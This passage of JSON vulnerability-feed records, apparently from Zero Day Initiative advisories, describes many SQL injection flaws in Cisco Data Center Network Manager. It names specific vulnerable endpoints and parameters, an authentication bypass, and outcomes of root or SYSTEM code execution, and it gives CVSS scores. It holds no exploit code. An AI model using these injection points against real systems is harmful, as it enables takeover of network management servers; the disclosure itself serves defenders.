9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-115", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-115/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:09", "description": 
"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the combinedconfig endpoint. When parsing the serialNumber parameter in the getSwitchName method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitchName SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-113", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-113/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:52", "description": "This 
vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the /rest/control/links endpoint. When parsing the destinationInterface parameter in the checkLinkUUID method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager checkLinkUUID SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-116", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-116/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:14", "description": "This 
vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getIslStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-077", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-077/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:22", 
"description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getPortGroupMember endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getPortGroupMember SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-066", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-066/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2022-01-31T22:11:03", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topology/switches/otv/feature service. When parsing the hostname parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDiscoveredDeviceCount hostname SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-098", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-098/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2022-01-31T22:11:31", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/switches service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitches SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-051", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-051/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:55", "description": 
"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the bulk endpoint. When parsing the fabTemplate parameter in the getConfigTemplateFileName method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getConfigTemplateFileName SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-111", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-111/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:33", "description": 
"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/modules service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getModules SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-048", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-048/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:11", "description": "This vulnerability allows remote 
attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbHealthWSService/DbHealthWS service. When parsing the sortType parameter of the getSensorDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-085", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-085/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:44", "description": "This vulnerability allows remote 
attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/rpm/getjobs endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getRPMTasks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-029", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-029/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:11", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbHealthWSService/DbHealthWS service. When parsing the sortType parameter of the getAccountingList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-086", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-086/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/endports endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndPorts SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-032", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-032/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the VpcWSService/VpcWS service. When parsing the third argument to the getVpcConsistentDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcCount SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-084", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-084/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:20", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data 
Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getOidLanStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-067", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-067/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected 
installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the vsans endpoint. When parsing the filterStr parameter in the getVsanDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVsanDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-105", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-105/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:23", "description": "This vulnerability allows remote attackers to execute arbitrary code on 
affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getVsanList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVsanList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 